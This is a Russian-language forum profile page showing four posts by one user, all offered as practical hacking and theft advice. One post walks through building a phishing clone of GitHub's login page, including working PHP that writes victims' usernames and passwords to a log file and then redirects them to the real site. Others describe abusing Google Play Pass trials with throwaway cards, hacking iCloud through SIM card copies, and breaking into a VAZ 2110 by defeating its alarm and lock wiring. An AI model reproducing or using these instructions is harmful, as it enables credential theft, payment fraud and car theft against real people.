Перейти к публикации

4ik4ik

Новичoк
  • Публикации

    17
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    1

Сообщения, опубликованные пользователем 4ik4ik


  1. Бесплатно получаем лицензионные приложения в GooglePlay

    Доброе утро, друзья! Недавно в GooglePlay появилась новая фича - подписка "GoogePlay Pass", которая даёт доступ почти ко всем играм и приложениям абсолютно бесплатно. 

    1. Переходим в GooglePlay;
    2. Нажимаем на надпись "Play Pass" —> "Начать работу";
    3. Привязываем карту и подключаем пробную подписку на месяц;
    4. PROFIT!

    Не забываем отменять подписку или использовать пустые виртуальные карты, иначе деньги спишутся без вашего согласия. Можно абузить с помощью новых аккаунтов гугла и чистки кэша ✌️


  2. Привет. Ловите хакинг)

    За пару минут мы научимся делать  фишинг с абсолютно любого сайта, страницы.  Думаю понятия слова фишинг вы и в сети найдете. Сразу же перейдем к делу:

    Для начала выбираем сайт, фейк которого вы хотите создать.Я буду рассматривать на примере гитхаба. Находим страницу с авторизацией.

    29884553_m.png

    Что бы скомуниздить страницу юзайте https://webparse.ru/

    При реге обязательно запросит почту, регаем временную почту на temp-mail. После регистрации в графе домена вводим адрес той страницы, которую будет дублировать.

    29884562_m.png

    После завершения копирования , вам на мыло придёт ссылка на скачивание архива с готовой страницей.

    Приступаем к второму этапу

    Чтобы эта страница ожила и приносила необходимый нам результат. Ищем  параметр action, нам нужно его изменить:

    29884587_m.png

    Делаем замену на auth.php

    На скриншоте этот параметр уже изменён.

    Теперь в папке с html файлом создаём auth.php и папку base

    29884603_m.png

    Открываем auth.php в любом удобном для вас кодовом редакторе я например юзаю Sublime Text 2  и добавляем следующий код:

    <?php file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND); ?>

    "file_put_contents" функция служит для записи данных в файл, "base/ds_logs.txt" - путь к файлу, где сохранятся пароли, "FILE_APPEND" - указывает на то, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

    Грузим с изменениями на хостинг. Права ставим 777.

    29884678_m.jpg

    Заходим на сайт для проверки и вводим данные, они будут сохранены по ссылке: вашдомен.com/base/ds_logs.txt

    Названия папки вы сможете сменить. 

    Всё ок, пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:

    header('Location: https://github.com/session');

    После ввода логина и пароля жертву перебросит на оригинальный сайт авторизации, тем временем нам сразу придут данные жертвы, которые запишутся в файлик.

    Для простого фишинга этих манипуляций вполне достаточно, если сильно заморочится можно сделать админку. 
    Думаю, что это кому-то будет полезным 


  3. 15.04.2020 в 15:00, YoshkinKOT сказал:

    Нужно знать почту к которой привязан icloud тогда можно еще чтото придумать. Но если там двухфакторка включена то нихуя не сделаешь. Слыхалчто могут сделать копию  симкарты. Брутить айклауд невозможно потому что он блокируется через 5 попыток. 

    верно, через копию симки можно хакнуть 


  4. смотря к какой машине ты собрался подходить ? приведу пример на Ваз 2110 .типичный случай - концевой выключатель сигналки на капот стоит в самой передней части машины- причем стандартно( во всех автосалонах ставят именно туда).
    делаем следуещее. 
    -на дворе ночь - темно-берем электошокер
    -подходим к машине спереди
    -под низом в нише бампера имеется ниша в которую слегкостью пролезает рука-тоесть тянемся вверх к выключателю и выдергиваем провод сигналки капота( тока осторожно чтоб не замкнуть на массу- а то пипец нах)
    -далее к этому проводу цепляешь крокодильчик электрошокера и .....

    Еще совет если нет электрошокера.
    - выдергиваем концевой провод сигналки на капот
    -далее рядом совсем если похорошему пощупать идет тросик открывания капота, так вот если его натянуть осторожно- капот откроется.
    -ну и все далее снимаешь осторожно клеммы с аккамулятора.и делаешь с машиной все что хочешь.
    -ну если все таки надо попасть срочняком в салон - делаем так (если темно берем фонарик 100%- глаза мона сломать) в том районе где открывается дверь - тоесть рядом с петлями проходит резиновая гофра с жгутом проводов.там их куча - ищем провода на блокировку двери -их 2(цвета не помню).разрезаешь ножом гофру- при возможности можно некоторые концы проводов вытянуть наружу и подносил аккумулятор и пробуем подать напряжение на провода( обычно я использую спицы или иголки длинные если провода не выдергиваеются-ну это только у иномарок).Один раз правда был прикол- подал напряжение на элекростеклоподемник.Вот и все.
    P.S. взлом проверен только на вазовской десятке .сам занимаюсь. на иномарки другая история

     

×
×
  • Создать...